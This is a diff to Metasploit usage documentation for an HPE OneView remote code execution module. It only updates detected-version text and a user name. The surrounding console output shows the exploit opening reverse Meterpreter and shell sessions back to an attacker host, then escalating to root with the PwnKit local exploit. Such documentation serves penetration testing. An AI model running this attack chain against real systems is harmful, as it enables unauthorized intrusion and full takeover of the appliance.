@@ -107,11 +107,11 @@ Exploit target:
107107View the full module info with the info, or info -d command.
108108
109109msf exploit(linux/http/hpe_oneview_rce) > check
110- [+] 192.168.86.141:443 - The target is vulnerable. Detected HPE OneView version 6.60 (API version 3800).
110+ [+] 192.168.86.141:443 - The target is vulnerable. Detected HPE OneView VM - Hyper-V version 6.60.07-0487691
111111msf exploit(linux/http/hpe_oneview_rce) > exploit
112112[*] Started reverse TCP handler on 192.168.86.122:4444
113113[*] Running automatic check ("set AutoCheck false" to disable)
114- [+] The target is vulnerable. Detected HPE OneView version 6.60 (API version 3800).
114+ [+] The target is vulnerable. Detected HPE OneView VM - Hyper-V version 6.60.07-0487691
115115[*] Meterpreter session 1 opened (192.168.86.122:4444 -> 192.168.86.141:22164) at 2025-12-19 12:21:36 +0000
116116
117117meterpreter > getuid
@@ -170,7 +170,7 @@ View the full module info with the info, or info -d command.
170170msf exploit(linux/http/hpe_oneview_rce) > exploit
171171[*] Started reverse SSL handler on 192.168.86.122:4444
172172[*] Running automatic check ("set AutoCheck false" to disable)
173- [+] The target is vulnerable. Detected HPE OneView version 6.60 (API version 3800).
173+ [+] The target is vulnerable. Detected HPE OneView VM - Hyper-V version 6.60.07-0487691
174174[*] Command shell session 2 opened (192.168.86.122:4444 -> 192.168.86.141:22420) at 2025-12-19 12:22:58 +0000
175175
176176id
184184### Example 3 (LPE)
185185
186186This example shows how we can use an existing Meterpreter session on an HPE OneView version ` 6.60.07 ` device, to
187- escalate privileges to root via the ` exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec ` module.
187+ escalate privileges from ` trm3 ` to ` root ` via the ` exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec ` module.
188188
189189```
190190msf exploit(linux/http/hpe_oneview_rce) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
0 commit comments